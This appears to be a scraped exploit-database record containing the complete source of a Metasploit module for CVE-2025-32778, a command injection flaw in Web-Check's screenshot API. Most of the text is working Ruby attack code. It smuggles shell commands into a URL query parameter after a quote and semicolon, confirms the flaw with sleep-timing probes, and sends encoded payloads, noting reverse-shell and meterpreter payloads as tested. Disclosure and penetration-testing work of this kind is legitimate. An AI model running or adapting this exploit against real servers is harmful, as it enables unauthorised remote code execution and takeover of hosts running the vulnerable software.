{“lastseen”:”2026-01-13T15:13:35″,”description”:”This Metasploit module exploits a command injection vulnerability in Web-Check’s \/api\/screenshot endpoint. The directChromiumScreenshot function uses childprocess.exec with unsanitized user input, allowing command injection via URL query parameters…”,”published”:”2026-01-13T00:00:00″,”modified”:”2026-01-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Web-Check Screenshot API Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:213735″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-32778″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n require ‘rex\/stopwatch’\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Web-Check Screenshot API Command Injection RCE’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a command injection vulnerability in Web-Check’s `\/api\/screenshot` endpoint.\\n The `directChromiumScreenshot()` function uses `child_process.exec()` with unsanitized user input,\\n allowing command injection via URL query parameters. The vulnerability was patched in commit\\n 0e4958aa10b2650d32439a799f6fc83a7cd46cef by replacing `exec()` with `execFile()`.\\n },\\n ‘Author’ =\\u003e [\\n ‘Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e’ # Metasploit module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-32778’],\\n [‘URL’, ‘https:\/\/github.com\/Lissy93\/web-check’],\\n [‘URL’, ‘https:\/\/github.com\/Lissy93\/web-check\/commit\/0e4958aa10b2650d32439a799f6fc83a7cd46cef’]\\n ],\\n ‘Platform’ =\\u003e %w[unix linux win],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Payload’ =\\u003e {\\n ‘DisableNops’ =\\u003e true,\\n ‘Encoder’ =\\u003e ‘cmd\/base64’\\n },\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix\/Linux Command’,\\n {\\n ‘Platform’ =\\u003e %w[unix linux],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Payload’ =\\u003e {\\n ‘Space’ =\\u003e 131068\\n }\\n # tested with cmd\/unix\/reverse_bash\\n # tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp\\n }\\n ],\\n [\\n ‘Windows Command’,\\n {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Payload’ =\\u003e {\\n ‘Space’ =\\u003e 2000\\n }\\n # tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp\\n }\\n ]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2025-04-12’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 3000\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘The base path to Web-Check’, ‘\/’])\\n ])\\n end\\n \\n def build_url(command = nil)\\n return Faker::Internet.url if command.nil?\\n \\n param = Faker::Alphanumeric.alphanumeric(number: rand(4..10))\\n \\”http:\/\/#{Faker::Internet.domain_name}?#{param}=\\\\\\”;#{command}\\\\\\”\\”\\n end\\n \\n def send_screenshot_request(command = nil)\\n url = build_url(command)\\n send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘screenshot’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘vars_get’ =\\u003e { ‘url’ =\\u003e url }\\n })\\n end\\n \\n def check\\n res, baseline_elapsed = Rex::Stopwatch.elapsed_time do\\n send_screenshot_request\\n end\\n \\n return CheckCode::Unknown(\\”#{peer} – No response from web service\\”) unless res\\n return CheckCode::Safe(‘Screenshot API endpoint not found’) if res.code == 404\\n \\n network_latency = [baseline_elapsed, 0.3].max\\n vprint_status(\\”Testing command injection (baseline: #{baseline_elapsed.round(2)}s)\\”)\\n sleep_tests = [2, 3, 4].map do |duration|\\n _, elapsed = Rex::Stopwatch.elapsed_time do\\n send_screenshot_request(\\”sleep #{duration}\\”)\\n end\\n threshold = duration – network_latency\\n vprint_status(\\”Sleep #{duration}s: #{elapsed.round(2)}s (threshold: #{threshold.round(2)}s)\\”)\\n { elapsed: elapsed, threshold: threshold }\\n end\\n \\n passed_tests = sleep_tests.count { |test| test[:elapsed] \\u003e= test[:threshold] }\\n \\n case passed_tests\\n when 2..3\\n return CheckCode::Vulnerable(‘Command injection vulnerability confirmed via sleep timing’)\\n when 1\\n return CheckCode::Detected(‘Screenshot API endpoint exists and may be vulnerable’)\\n end\\n \\n return CheckCode::Detected(‘Screenshot API endpoint exists but RCE not confirmed’) if res.code == 200 \\u0026\\u0026 res.body.to_s.include?(‘image’)\\n \\n CheckCode::Unknown(‘Could not determine vulnerability status’)\\n end\\n \\n def exploit\\n vprint_status(‘Sending payload via screenshot API’)\\n send_screenshot_request(payload.encoded)\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213735″,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213735\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-13T15:13:35″,”description”:”This Metasploit module exploits a command injection vulnerability in Web-Check’s \/api\/screenshot endpoint. The directChromiumScreenshot function uses childprocess.exec with unsanitized user input, allowing command injection via…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-35284","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n